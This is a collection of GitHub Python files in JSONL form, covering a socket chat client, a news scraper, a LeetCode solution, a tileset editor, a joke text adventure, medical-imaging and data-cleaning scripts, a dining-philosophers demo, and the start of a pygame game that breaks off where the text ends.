+{"seq_id":"28991947067","text":"import socket\nimport threading\n\nHOST = \"127.0.0.1\"\nPORT = 4780\n\ndef communicating_to_server(c):\n username = input(\"Username: \")\n is_not_empty = bool(username)\n while(not is_not_empty):\n username = input(\"Username: \")\n is_not_empty = bool(username)\n\n c.sendall(bytes(username, 'utf-8'))\n threading.Thread(target=listening_for_message, args=(c,)).start()\n send_message(c)\n\ndef listening_for_message(c):\n\n while True:\n response = c.recv(2048).decode(\"utf-8\")\n print(response)\n\ndef send_message(c):\n\n while True:\n msg = input(\"Message: \")\n is_not_empty = bool(msg)\n if is_not_empty:\n c.sendall(bytes(msg, \"utf-8\"))\n else:\n pass\n\n\n\ndef main():\n c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n c.connect((HOST, PORT))\n print(\"Successful connection to server\")\n communicating_to_server(c)\n except:\n print(\"Unable to establish a connection\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"MGCreator/case-study-2-s2","sub_path":"Programming/Chat/CLI/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27440158700","text":"import json\nimport math\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pipeline.scrapers.utils import *\n\n\nclass CNNSearchScraper:\n url = 'https://search.prod.di.api.cnn.io/content?q={keyword}&size=10&from=0&page={page}&sort=relevance&types=article'\n\n def search(self, keyword, top_n=10):\n response = requests.get(self.url.format(keyword=keyword, page=1))\n\n if response.status_code == 200:\n page_content = response.content.decode(\"utf-8\")\n\n json_data = json.loads(page_content)\n\n last_page_number = math.floor(json_data['meta']['total'] / 10)\n\n titles = []\n texts = []\n\n while len(titles) < top_n:\n for page_number in range(1, last_page_number + 1):\n response = requests.get(self.url.format(keyword=keyword, page=page_number))\n\n if response.status_code == 200:\n page_content = response.content.decode(\"utf-8\")\n\n json_data = json.loads(page_content)\n\n for result in json_data['result']:\n title = result['headline']\n href = result['url']\n print(\"Title:\", title)\n print(\"Href:\", href)\n print(\"-\" * 50)\n response = requests.get(href)\n soup = BeautifulSoup(response.content, \"html.parser\")\n paragraphs = soup.find_all('div', class_='zn-body__paragraph')\n paragraphs = [p.get_text(\" \", strip=True).replace(\"\\n\", \" \") for p in paragraphs]\n if len(paragraphs) == 0:\n paragraphs = soup.find_all(\"p\")\n paragraphs = [p.get_text(\" \", strip=True).replace(\"\\n\", \" \") for p in paragraphs]\n if len(paragraphs) == 0:\n continue\n paragraphs = \"\\n\".join(paragraphs)\n titles.append(title)\n texts.append(paragraphs)\n if len(titles) == top_n:\n break\n if len(titles) == top_n:\n break\n if len(titles) == top_n:\n break\n if len(titles) == top_n:\n break\n\n return pd.DataFrame({'title': titles, 'text': texts})\n\n\nif __name__ == '__main__':\n scraper = CNNSearchScraper()\n print(scraper.search('coronavirus', top_n=10))\n","repo_name":"Weikang01/fake_news_detector","sub_path":"pipeline/scrapers/cnn_search_scraper.py","file_name":"cnn_search_scraper.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28186639145","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n carry = 0\n result = ListNode(0)\n pointer = result\n while (l1 or l2 or carry):\n first_num = l1.val if l1 else 0\n second_num = l2.val if l2 else 0\n total_sum = first_num + second_num + carry\n carry = total_sum // 10\n num = total_sum % 10\n\n pointer.next = ListNode(num)\n pointer = pointer.next\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n\n return result.next\n \n'''\nInput: l1 = [2,3,7,8], l2 = [5,6,4,9]\n\nOutput: [7,9,1,8,1]\n '''\n","repo_name":"BsalBhandari/leetCode-Python","sub_path":"addTwoNum.py","file_name":"addTwoNum.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27481896803","text":"import json\nimport pyray as rl\nimport argparse\nimport os.path\nfrom typing import Literal\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"image\", help=\"image containing the tileset\")\nargs = parser.parse_args()\njson_file = os.path.splitext(args.image)[0] + \".def.json\"\n\nincluded_tiles: dict[tuple[int, int], Literal[\"collide\", \"none\"]] = {}\ntile_size = 16\n\nif os.path.exists(json_file):\n with open(json_file, \"r\") as f:\n d = json.load(f)\n if d:\n print(f\">>> Loading previous definition from {json_file}\")\n # Use width from first rectangle as tile_size\n # NOTE: assumes all tiles are the same height/width\n tile_size = d[0][\"rect\"][2]\n included_tiles = {\n (tile[\"rect\"][0] // tile_size, tile[\"rect\"][1] // tile_size): tile[\n \"collision\"\n ]\n for tile in d\n }\n\nrl.init_window(800, 600, \"Tileset generator\")\n\ntex = rl.load_texture(args.image)\n\ntile_size_ptr = rl.ffi.new(\"int *\")\ntile_size_ptr[0] = tile_size\ntile_size_edit = False\n\nSCALE = 2\nORIGIN = (10, 50)\n\ncamera = rl.Camera2D(ORIGIN, (0, 0), 0, SCALE)\n\nrl.set_target_fps(60)\n\n# the subset of tile coordinates, mapped to their collision type\nwhile not rl.window_should_close():\n if rl.is_key_released(rl.KEY_F):\n rl.toggle_fullscreen()\n\n rl.begin_drawing()\n rl.clear_background(rl.BLACK)\n if rl.gui_value_box(\n rl.Rectangle(60, 10, 100, 30),\n \"tile size\",\n tile_size_ptr,\n 1,\n 255,\n tile_size_edit,\n ):\n tile_size_edit = not tile_size_edit\n tile_size = tile_size_ptr[0]\n\n rl.begin_mode_2d(camera)\n rl.draw_texture(tex, 0, 0, rl.WHITE)\n\n for x in range(tex.width // tile_size + 1):\n rl.draw_line(x * tile_size, 0, x * tile_size, tex.height, rl.PURPLE)\n\n for y in range(tex.height // tile_size + 1):\n rl.draw_line(0, y * tile_size, tex.width, y * tile_size, rl.PURPLE)\n\n for tile in included_tiles:\n color = rl.RED if included_tiles[tile] == \"collide\" else rl.WHITE\n rl.draw_rectangle_lines(\n tile[0] * tile_size, tile[1] * tile_size, tile_size, tile_size, color\n )\n\n mouse_pos_world = rl.get_screen_to_world_2d(rl.get_mouse_position(), camera)\n mouse_tile = (\n int(mouse_pos_world.x // tile_size),\n int(mouse_pos_world.y // tile_size),\n )\n\n if rl.is_mouse_button_released(rl.MOUSE_BUTTON_LEFT):\n if mouse_tile in included_tiles:\n del included_tiles[mouse_tile]\n else:\n included_tiles[mouse_tile] = \"none\"\n\n if rl.is_mouse_button_released(rl.MOUSE_BUTTON_RIGHT):\n if included_tiles.get(mouse_tile, None) == \"collide\":\n included_tiles[mouse_tile] = \"none\"\n else:\n included_tiles[mouse_tile] = \"collide\"\n\n rl.end_mode_2d()\n rl.end_drawing()\n\nwith open(json_file, \"w\") as f:\n json.dump(\n [\n {\n \"rect\": [\n tile[0] * tile_size,\n tile[1] * tile_size,\n tile_size,\n tile_size,\n ],\n \"collision\": included_tiles[tile],\n }\n for tile in included_tiles\n ],\n f,\n )\n\nprint(f\">>> Wrote tileset definition output to {json_file}\")\n\nrl.close_window()\n","repo_name":"clsater/legend-of-zink","sub_path":"demoassets/gen_tiledef.py","file_name":"gen_tiledef.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20941740087","text":"import sys\nfrom time import sleep\n\ndef loading(str):\n\timport sys\n\tfrom time import sleep\n\n\tfor char in str:\n\t\tsleep(0.0)\n\t\tsys.stdout.write(char)\n\t\tsys.stdout.flush()\n\ndef typewrite(str):\n\timport sys\n\tfrom time import sleep\n\n\tfor char in str:\n\t\tsleep(0.03)\n\t\tsys.stdout.write(char)\n\t\tsys.stdout.flush()\n\ndef text():\n\tloading(\"Loading........................................\")\n\timport time\n\t\n\tsleep(.5)\n\tname=raw_input(\"\\nGLERB GLBO\\n\")\n\n\tsleep(.3)\n\n\ttypewrite(\"\\n gleep gloop loop {}\".format(name))\n\n\n\tsleep(.3)\n\n\ttypewrite(\"\\nYou notice the tree you fell from has two doors on it a left and a right door \\nthey both lead to a fjlarp\\n\")\n\tsleep(1)\n\ndef blue1():\n\ttypewrite(\"You join the blue team and they hand you a freaking hotdog...\\n dont worry its a braught worst lfmao gg m8\")\n\ttypewrite(\"\\nYou just stand there and have no idea whats going on buts thats ok\\nThen sum Butt head runs at you with a hamster FIRMLy Griped in his hands\\n looks like he is on memes \\n the dank kind\")\n\ndef red1():\n\ttypewrite(\"you go into the red arean hoping to find team8s\\nbut there is only hamsters\\nyout think atleast\\ndont forget you have been drugges m8 pirtay m9\")\n\ttypewrite(\"\\nYou pick up your Pepe sword and grab a handfull of magic beans charlie\\n Then You find a golden ticket\\n YOU STARat TO SPRINT AT THIS BRO WHO LOOKS DUMB AND SMELLS LIKE CHEESE haha SOML lol!\")\n\ndef bail1():\n\ttypewrite(\"You leave Your HOT wife... DUMB BUMB WANTS GUM right get it ? no you don't\\n frekign beta noob\")\n\ndef stay1():\n\ttypewrite(\"\\nYou and Your Hunnie Pop Go to coounsling and try to work tings out....\\n but it gets so boring that you starting taking coaine to spice things up a little bit\\n get it SPICE things up haha jk jk\")\n\ndef left1():\n\ttypewrite(\"The gold ball will make you able to eat allot of pizza and not got sick\\nbruhhh You get into a ship\")#next question i have to mentin that the ball is laced with lcd\n\ndef left0():\n\ttypewrite(\"You walk into a smelly hotdog.\\nThe dog locks behind you.\")\n\ttypewrite(\"You see some Lcd and you snort that meme\\n\")\n\ttypewrite(\"SPoiler It turns out your in the hugner games and you got druged... BEata noob\\n Blue OR RED TEAM??????\")\n\tq6 = raw_input(\"\\nBlue or Red\\n\").lower()\n\tif q6 == \"blue\":\n\t\tblue1()\n\telif q6 == \"red\":\n\t\tred1()\n\ndef right1():\n\ttypewrite(\"SILVER BALL GIVS YOU POWERS YOU marry THE HOT CHICK GLEEP LOOP LOPOOPO\")\n\tsilver1()\n\t\ndef rightquestion1():\n\tq4 = raw_input(\"Silver or Gold\\n\").lower()\n\tif q4 == \"silver\":\n\t\tright1()\n\telif q4 ==\"gold\":\n\t\tleft1()\n\trightquestion1()\n\ndef right0():\n\tsleep(1)\n\ttypewrite(\"you play jker with a ladie gllop\\n\")\n\ttypewrite(\"There is a golden ping pong ball \")\n\ttypewrite(\"and a silver ping pong ball\\n\")\n\trightquestion1()\ndef silver1():\n\ttypewrite(\"\\n Ten YEARS LATER\\n You and flearjk Are having RElationship Issuies That is a no goo my friend\\n Will you try to Stay and Work it out OR BAIL\\n\")\n\tq5 = raw_input(\"Stay or Bail\\n\").lower()\n\tif q5 == \"stay\":\n\t\tstay1()\n\telif q5 == \"bail\":\n\t\tbail1()\n\ndef main():\n\ttext()\n\tq3 = raw_input(\"Left or Right\\n\").lower()\n\tif q3 == \"left\":\n\t\tleft0()\n\telif q3 == \"right\":\n\t\tright0()\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n\n\n\n","repo_name":"sporttickets/EliteMormons","sub_path":"madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72809507368","text":"import argparse\n\nimport pandas as pd\nimport numpy as np\nimport os\nfrom matplotlib.pyplot import imshow, imsave\nfrom dicomseries import DicomSeries\nfrom utilities import (\n get_binary_body,\n fill_binary_gaps,\n mark_body,\n measure_circumference,\n detect_number_of_bones,\n get_waist_range,\n select_waist_measurement\n)\n\n# This is a sample Python script.\nparser = argparse.ArgumentParser(description='Automatically Calculate Waist Circumference from CT Scan')\nparser.add_argument('-i', '--input', help='Input DICOM Series Directory', required=True)\nparser.add_argument('-o', '--output', help='Output CSV File Directory', required=True)\nparser.add_argument('-t', '--threshold', help='Bone Area Threshold to filter number of bones', required=False,\n default=100)\nargs = parser.parse_args()\n\n\ndef main():\n # Create a DicomSeries object\n dicom_series = DicomSeries(args.input)\n # Read the DicomSeries object at an HU where bone is easily visible\n ct_scan = dicom_series.read_dicom_series('*', 0, 500)\n try:\n if ct_scan.shape[2] < 10 or dicom_series.series_info['ct_direction'] != 'AX':\n print('Invalid CT Scan')\n return\n except KeyError:\n print('Invalid CT Scan')\n return\n outdir = f'{args.output}/{dicom_series.mrn}'\n # Create the output directory if it does not exist\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n # Make the base name of the output file\n description = f'MRN{dicom_series.mrn}_ACC{dicom_series.acc}_{dicom_series.cut}_waist_circumferences'\n # Create dictionary to store the results\n waist_circumferences = {}\n # For each cut, binarize the image, fill the gaps, measure the circumference, and get number of bones\n for image in range(ct_scan.shape[2]):\n image_slc = ct_scan[:, :, image]\n binary_im = get_binary_body(image_slc)\n binary_im = fill_binary_gaps(binary_im)\n body_array = mark_body(binary_im)\n measurement = measure_circumference(body_array, dicom_series.series_info['width'])\n n_bones = detect_number_of_bones(image_slc, upper_bound=225, area_threshold=int(args.threshold))\n waist_circumferences[image] = {'waist_circumference_cm': measurement, 'n_bones': n_bones}\n # Write the results to a CSV file\n df = pd.DataFrame(waist_circumferences).T\n df.to_csv(f'{outdir}/{description}.csv')\n # Select the waist measurement from the CSV file\n max_ix, waist_range = get_waist_range(df)\n waist_center, waist_ix, = select_waist_measurement(df, max_ix, waist_range)\n if waist_ix is None:\n print('No waist measurement found')\n return\n # Store the data around the waist to calculate the mean and standard deviation\n try:\n five_measure = df.loc[(waist_ix - 2):(waist_ix + 2), 'waist_circumference_cm']\n except Exception:\n print('5 index out of range for comparison')\n five_measure = None\n try:\n fifteen_measure = df.loc[(waist_ix - 8):(waist_ix + 8), 'waist_circumference_cm']\n except Exception:\n print('15 index out of range for comparison')\n fifteen_measure = None\n important_vals = [\n str(dicom_series.mrn),\n dicom_series.series_info['scan_date'],\n waist_ix,\n waist_center\n ]\n if five_measure is not None:\n important_vals.append(five_measure.mean())\n important_vals.append(five_measure.std())\n else:\n important_vals.append(None)\n important_vals.append(None)\n if fifteen_measure is not None:\n important_vals.append(fifteen_measure.mean())\n important_vals.append(fifteen_measure.std())\n else:\n important_vals.append(None)\n important_vals.append(None)\n # Write the important values to a CSV file\n fig = imshow(ct_scan[:, :, waist_ix])\n imsave(f'{outdir}/{description}.png', fig.get_array())\n pd.DataFrame([important_vals],\n columns=['MRN', 'ScanDate', 'WaistIndex', 'WaistCenter', '5-Mean', '5-Std', '15-Mean',\n '15-Std']).to_csv(f'{outdir}/{description}_measurement.csv', index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"idinsmore1/waistCircumference","sub_path":"waistCircumference/calculate_waist_circumference.py","file_name":"calculate_waist_circumference.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21187931581","text":"import pandas as pd\nfrom datetime import timedelta\n\npd.set_option('display.max_columns', 10)\n\npath_accident_data = 'data/raw/US_Accidents_Dec21_updated.csv'\npath_weather_data = 'data/raw/WeatherEvents_Jan2016-Dec2021.csv'\npath_gdp_data = 'data/raw/SAGDP2N__ALL_AREAS_1997_2020.csv'\npath_employment_data = 'data/raw/CAEMP25N__ALL_AREAS_2001_2019.csv'\n\nmapping_state_path = 'data/cleaned/mapping/mapping_pop_state.csv'\n\npath_output_accident_data = 'data/cleaned/data_accident_2016_2021.csv'\npath_output_weather_data = 'data/cleaned/data_weather_2016_2021.csv'\npath_output_gdp_data = 'data/cleaned/data_gdp_2015_2020.csv'\npath_output_employment_data = 'data/cleaned/data_employment_2015_2019.csv'\n\n\ndef import_raw_data(path_accident_data, path_weather_data, path_gdp_data, path_employment_data):\n df_acc = pd.read_csv(path_accident_data)\n df_wea = pd.read_csv(path_weather_data)\n df_gdp = pd.read_csv(path_gdp_data)\n df_emp = pd.read_csv(path_employment_data, encoding='ISO-8859-1')\n return df_acc, df_wea, df_gdp, df_emp\n\n\ndef aggregate_accident_data(df_acc):\n \"\"\"\n Get year, month of each accident from Start_Time attribute\n Aggregate by year, month, state, zipcode, severity of accidents\n map 'state' column'\n \"\"\"\n df_acc['year'] = pd.to_datetime(df_acc['Start_Time']).dt.year\n df_acc['month'] = pd.to_datetime(df_acc['Start_Time']).dt.month\n df_acc['Zipcode'] = df_acc['Zipcode'].str[:5]\n\n df_acc_agg = df_acc.groupby(['year', 'month', 'State', 'Zipcode', 'Severity'], group_keys=False)[\n 'ID'].count().reset_index()\n df_acc_agg.columns = ['year', 'month', 'postal_abbr', 'zipcode', 'severity', 'count_accidents']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_acc_agg = df_acc_agg.merge(df_mapping_state, how='left', on='postal_abbr')\n\n return df_acc_agg[['year', 'month', 'state_code', 'state', 'postal_abbr', 'zipcode', 'severity', 'count_accidents']]\n\n\ndef aggregate_weather_data(df_wea):\n \"\"\"\n Get day, month, year of each record from StartTime attribute\n Aggregate by year, month, zipcode, state, event type, and severity of events\n Count the duration (in days) for the specific events by year/month/zipcode/state using the unique count of days\n map 'state' column\n \"\"\"\n df_wea['start_time'] = pd.to_datetime(df_wea['StartTime(UTC)'])\n df_wea['end_time'] = pd.to_datetime(df_wea['EndTime(UTC)'])\n df_wea['year'] = df_wea['start_time'].dt.year\n df_wea['month'] = df_wea['start_time'].dt.month\n df_wea['day'] = df_wea['start_time'].dt.day\n\n df_wea_agg = df_wea.groupby(['year', 'month', 'State', 'ZipCode', 'Type', 'Severity'])[\n 'day'].nunique().reset_index()\n df_wea_agg.columns = ['year', 'month', 'postal_abbr', 'zipcode', 'event_type', 'severity', 'duration_days']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_wea_agg = df_wea_agg.merge(df_mapping_state, how='left', on='postal_abbr')\n\n return df_wea_agg[['year', 'month', 'state_code', 'state', 'postal_abbr', 'zipcode', 'event_type', 'severity', 'duration_days']]\n\n\ndef aggregate_gdp_data(df_gdp):\n \"\"\"\n flatten number of GDP for each year (columns) to rows & map 'state' column\n Aggregate by year, state, and industry of GDP\n \"\"\"\n start_year, end_year = 2015, 2019\n\n # filtering industries\n col_include_linecode = [3, 6, 10, 11, 12, 34, 35, 36, 45, 50, 59, 68, 75, 82, 83]\n df_gdp = df_gdp[df_gdp['LineCode'].isin(col_include_linecode)]\n\n # mapping new industry names\n mapping_industry = {\n 3: 'agriculture',\n 6: 'mining',\n 10: 'utilities',\n 11: 'construction',\n 12: 'manufacturing',\n 34: 'wholesale_trade',\n 35: 'retail_trade',\n 36: 'transportation',\n 45: 'information',\n 50: 'finance',\n 59: 'services',\n 68: 'education',\n 75: 'entertainment',\n 82: 'others',\n 83: 'government'\n }\n df_gdp['industry'] = df_gdp['LineCode'].map(mapping_industry)\n\n df_gdp_melt = pd.melt(df_gdp, id_vars=['GeoName', 'industry'],\n value_vars=[str(yr) for yr in range(start_year, end_year + 1)], \\\n var_name='year', value_name='gdp_millions')\n # df_gdp_melt['Description'] = df_gdp_melt['Description'].str.strip()\n\n df_gdp_melt.columns = ['state', 'industry', 'year', 'gdp_millions']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_gdp_melt = df_gdp_melt.merge(df_mapping_state, how='inner', on='state')\n\n return df_gdp_melt[['year', 'state_code', 'state', 'postal_abbr', 'industry', 'gdp_millions']]\n\n\ndef aggregate_employment_data(df_emp):\n \"\"\"\n flatten number of employment for each year (columns) to rows & map 'state' column\n Aggregate by year, state, and industry of employment\n \"\"\"\n start_year, end_year = 2015, 2019\n\n # filtering industries\n col_include_linecode = [70, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2001, 2002, 2010]\n df_emp = df_emp[df_emp['LineCode'].isin(col_include_linecode)]\n\n # mapping new industry names\n mapping_industry = {\n 70: 'farm',\n 100: 'forestry',\n 200: 'mining',\n 300: 'utilities',\n 400: 'construction',\n 500: 'manufacturing',\n 600: 'wholesale_trade',\n 700: 'retail_trade',\n 800: 'transportation',\n 900: 'information',\n 1000: 'finance',\n 1100: 'real_estate',\n 1200: 'professional',\n 1300: 'management',\n 1400: 'administrative_support',\n 1500: 'education',\n 1600: 'healthcare',\n 1700: 'entertainment',\n 1800: 'accommodation_food',\n 1900: 'others',\n 2001: 'federal_civilian',\n 2002: 'military',\n 2010: 'state_local'\n }\n df_emp['industry'] = df_emp['LineCode'].map(mapping_industry)\n\n df_emp_melt = pd.melt(df_emp, id_vars=['GeoName', 'industry'],\n value_vars=[str(yr) for yr in range(start_year, end_year + 1)], \\\n var_name='year', value_name='num_employment')\n\n # df_emp_melt['Description'] = df_emp_melt['Description'].str.strip()\n df_emp_melt.columns = ['state', 'industry', 'year', 'num_employment']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_emp_melt = df_emp_melt.merge(df_mapping_state, how='inner', on='state')\n\n return df_emp_melt[['year', 'state_code', 'state', 'postal_abbr', 'industry', 'num_employment']]\n\n\ndef write_to_csv(df_list, path_list):\n assert len(df_list) == len(path_list), 'different dataframe and output path lengths'\n for i in range(len(df_list)):\n df_list[i].to_csv(path_list[i], index=False)\n\n\nif __name__ == '__main__':\n df_acc, df_wea, df_gdp, df_emp = import_raw_data(path_accident_data, path_weather_data, path_gdp_data, path_employment_data)\n\n\n df_acc_agg = aggregate_accident_data(df_acc)\n df_wea_agg = aggregate_weather_data(df_wea)\n df_gdp_agg = aggregate_gdp_data(df_gdp)\n df_emp_agg = aggregate_employment_data(df_emp)\n\n df_list = [df_acc_agg, df_wea_agg, df_gdp_agg, df_emp_agg]\n path_list = [path_output_accident_data, path_output_weather_data, path_output_gdp_data, path_output_employment_data]\n\n write_to_csv(df_list, path_list)\n\n\n\n\n\n\n\n\n\n","repo_name":"bvorapoom/usc_apds","sub_path":"551_Data Management/Project/cleanData.py","file_name":"cleanData.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8711178958","text":"import threading\r\nimport random\r\nimport time\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\nclass Philosopher(threading.Thread):\r\n running = True\r\n\r\n # ---------------------------------------------------------------------------\r\n def __init__(self, xname, chopStickLeft, chopStickRight):\r\n threading.Thread.__init__(self)\r\n self.name = xname\r\n self.chopStickLeft = chopStickLeft\r\n self.chopStickRight = chopStickRight\r\n\r\n # ------------------------------------------------------------------------------\r\n def run(self):\r\n while self.running:\r\n time.sleep(random.uniform(3, 15))\r\n print('%s want to eat a meal.' % self.name)\r\n self.dine()\r\n\r\n # -----------------------------------------------------------------------------------\r\n def dine(self):\r\n chopStick1, chopStick2 = self.chopStickLeft, self.chopStickRight\r\n\r\n while self.running:\r\n chopStick1.acquire(True)\r\n locked = chopStick2.acquire(False)\r\n if locked: break\r\n chopStick1.release()\r\n print('%s exchange chopsticks' % self.name)\r\n chopStick1, chopStick2 = chopStick2, chopStick1\r\n else:\r\n return\r\n\r\n self.dining()\r\n chopStick2.release()\r\n chopStick1.release()\r\n\r\n # -------------------------------------------------------------------------------\r\n def dining(self):\r\n print('%s start to eat meal ' % self.name)\r\n time.sleep(random.uniform(1, 10))\r\n print('%s finishes eat meal && thinking.' % self.name)\r\n # ---------------------------------------------------------------------------------\r\n\r\n\r\ndef PhilosophersDiningTime():\r\n chopSticks = [threading.Lock() for n in range(7)]\r\n philosopherNames = ('Nietzsche', 'Averroes', 'Ambrose', 'Damascius', 'Galilei', 'Gorgias', 'Iamblichus')\r\n\r\n philosophers = [Philosopher(philosopherNames[i], chopSticks[i % 7], chopSticks[(i + 1) % 7]) \\\r\n for i in range(7)]\r\n\r\n random.seed(507129)\r\n Philosopher.running = True\r\n for p in philosophers: p.start()\r\n time.sleep(100)\r\n Philosopher.running = False\r\n print(\"One round going to finish\")\r\n\r\n\r\n# ----------------------------------------------------------------------------------------------------------------------\r\nPhilosophersDiningTime()\r\n","repo_name":"b00m13/Dining_Philosophers","sub_path":"Nijat_Alammadov_Philosophers.py","file_name":"Nijat_Alammadov_Philosophers.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71589378728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nintensity_normalization.exec.zscore_normalize\n\ncommand line executable for Z-score intensity normalization routine\n\nAuthor: Jacob Reinhold (jacob.reinhold@jhu.edu)\n\nCreated on: May 30, 2018\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport warnings\n\nwith warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=FutureWarning)\n from intensity_normalization.errors import NormalizationError\n from intensity_normalization.normalize import zscore\n from intensity_normalization.utilities import io\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(description='Normalize image intensity by subtracting the mean '\n 'and dividing by the standard deviation of the whole brain')\n required = parser.add_argument_group('Required')\n required.add_argument('-i', '--image', type=str, required=True,\n help='path to a directory of/single nifti MR image of the brain')\n required.add_argument('-o', '--output-dir', type=str, default=None,\n help='path to output normalized images '\n '(default: to directory containing images)')\n\n options = parser.add_argument_group('Options')\n options.add_argument('-m', '--brain-mask', type=str, default=None,\n help='path to a directory of/single nifti brain mask for the image')\n options.add_argument('-s', '--single-img', action='store_true', default=False,\n help='image and mask are individual images, not directories')\n options.add_argument('-p', '--plot-hist', action='store_true', default=False,\n help='plot the histograms of the normalized images, save it in the output directory')\n options.add_argument('-v', '--verbosity', action=\"count\", default=0,\n help=\"increase output verbosity (e.g., -vv is more than -v)\")\n return parser\n\n\ndef process(image_fn, brain_mask_fn, output_dir, logger):\n img = io.open_nii(image_fn)\n dirname, base, _ = io.split_filename(image_fn)\n if output_dir is not None:\n dirname = output_dir\n if not os.path.exists(dirname):\n logger.info('Making output directory: {}'.format(dirname))\n os.mkdir(dirname)\n if brain_mask_fn is None:\n mask = None\n else:\n if brain_mask_fn == 'nomask':\n mask = 'nomask'\n else:\n mask = io.open_nii(brain_mask_fn)\n normalized = zscore.zscore_normalize(img, mask)\n outfile = os.path.join(dirname, base + '_zscore.nii.gz')\n logger.info('Normalized image saved: {}'.format(outfile))\n io.save_nii(normalized, outfile, is_nii=True)\n\n\ndef main(args=None):\n args = arg_parser().parse_args(args)\n if args.verbosity == 1:\n level = logging.getLevelName('INFO')\n elif args.verbosity >= 2:\n level = logging.getLevelName('DEBUG')\n else:\n level = logging.getLevelName('WARNING')\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=level)\n logger = logging.getLogger(__name__)\n try:\n if not args.single_img:\n if not os.path.isdir(args.image):\n raise NormalizationError('if single-img option off, then image must be a directory')\n img_fns = io.glob_nii(args.image)\n if args.brain_mask is None:\n mask_fns = [None] * len(img_fns)\n else:\n if os.path.isdir(args.brain_mask):\n mask_fns = io.glob_nii(args.brain_mask)\n else:\n logger.info('whole image z-score normalization enabled')\n mask_fns = ['nomask'] * len(img_fns)\n if len(img_fns) != len(mask_fns) and len(img_fns) > 0:\n raise NormalizationError('input images and masks must be in correspondence and greater than zero '\n '({:d} != {:d})'.format(len(img_fns), len(mask_fns)))\n\n for i, (img, mask) in enumerate(zip(img_fns, mask_fns), 1):\n logger.info('Normalizing image {} ({:d}/{:d})'.format(img, i, len(img_fns)))\n dirname, base, _ = io.split_filename(img)\n if args.output_dir is not None:\n dirname = args.output_dir\n process(img, mask, dirname, logger)\n\n else:\n if not os.path.isfile(args.image):\n raise NormalizationError('if single-img option on, then image must be a file')\n logger.info('Normalizing image {}'.format(args.image))\n dirname, base, _ = io.split_filename(args.image)\n process(args.image, args.brain_mask, dirname, logger)\n\n if args.plot_hist:\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=FutureWarning)\n from intensity_normalization.plot.hist import all_hists\n import matplotlib.pyplot as plt\n bm = args.brain_mask if args.brain_mask is None else \\\n args.brain_mask if os.path.isdir(args.brain_mask) else None\n ax = all_hists(args.output_dir, bm)\n ax.set_title('Z-Score')\n plt.savefig(os.path.join(args.output_dir, 'hist.png'))\n\n return 0\n except Exception as e:\n logger.exception(e)\n return 1\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"HaoLi12345/skull_stripping","sub_path":"AGS/src/pre_processing/intensity_normalization_github/intensity_normalization/exec/zscore_normalize.py","file_name":"zscore_normalize.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23928557385","text":"import pygame\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600,))\nGame_running = True\n\n# BackGround Img\nbackground = pygame.image.load(\"wooden_background_board_65898_800x600 222.jpg\")\n\n# Title and icon\npygame.display.set_caption(\"100 Game\")\nicon = pygame.image.load(\"number-blocks.png\")\npygame.display.set_icon(icon)\n\n# Digit One 1 !\noneImg = pygame.image.load(\"one (1).png\")\noneX = 150\noneY = 50\noneX_change = 0\n\n\ndef Digit_One(x, y):\n screen.blit(oneImg, (x, y))\n\n\n# Digit Two !\ntwoImg = pygame.image.load(\"two.png\")\ntwoX = 250\ntwoY = 50\n\n\ndef Digit_Two(x, y):\n screen.blit(twoImg, (x, y))\n\n\n# Digit Three !\nthreeImg = pygame.image.load(\"three.png\")\nthreeX = 350\nthreeY = 50\n\n\ndef Digit_Three(x, y):\n screen.blit(threeImg, (x, y))\n\n\n# Digit Four !\nfourImg = pygame.image.load(\"four.png\")\nfourX = 450\nfourY = 50\n\n\ndef 